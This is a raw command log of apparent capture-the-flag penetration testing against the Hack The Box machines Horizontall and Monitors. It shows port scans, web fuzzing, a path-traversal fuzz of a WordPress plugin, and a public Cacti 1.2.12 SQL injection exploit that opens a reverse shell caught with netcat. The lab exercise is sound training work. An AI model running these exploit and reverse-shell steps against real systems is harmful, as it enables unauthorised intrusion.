sudo nmap 10.10.11.105 -sC -sV -oN nmap-tcp-full -p- --min-rate 10000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 20:43 IST
Nmap scan report for 10.10.11.105
Host is up (0.21s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)

ffuf -c -u http://horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 200
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/
       v1.3.1 Kali Exclusive <3

gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://horizontall.htb/
[+] Method:       GET
[+] Threads:      200
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb/ -H "Host:FUZZ.horizontall.htb" --hl 1,7
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://horizontall.htb/
Total requests: 114441
=====================================================================

ffuf -c -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 200
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/
       v1.3.1 Kali Exclusive <3

sudo nmap 10.10.10.238 -sC -sV -oN nmap-tcp-full -p- --min-rate 10000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-11 10:38 IST
Nmap scan report for 10.10.10.238
Host is up (0.21s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)

ffuf -c -u http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../..//FUZZ -w file_inclusion_linux.txt -fw 1 -fs 0 -fl 1
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/
       v1.3.1 Kali Exclusive <3

python3 49810.py -h
usage: 49810.py [-h] -t <target/host URL> -u <user> -p <password> --lhost <lhost> --lport <lport>
[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution
optional arguments:
  -h, --help            show this help message and exit
  -t <target/host URL>  target/host URL, example: http://192.168.15.58
  -u <user>             user to log in
  -p <password>         user's password

python3 49810.py -t http://cacti-admin.monitors.htb -u admin -p <PASSWORD> --lhost 10.10.14.225 --lport 80
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:4bf2475c0b3d453783fc1f9665153e363feb84b5,1631343319
[+] Trying to log in...
[+] Successfully logged in!
[+] SQL Injection:
"name","hex"
"",""

sudo nc -lvnp 80
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.10.238.
Ncat: Connection from 10.10.10.238:40976.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)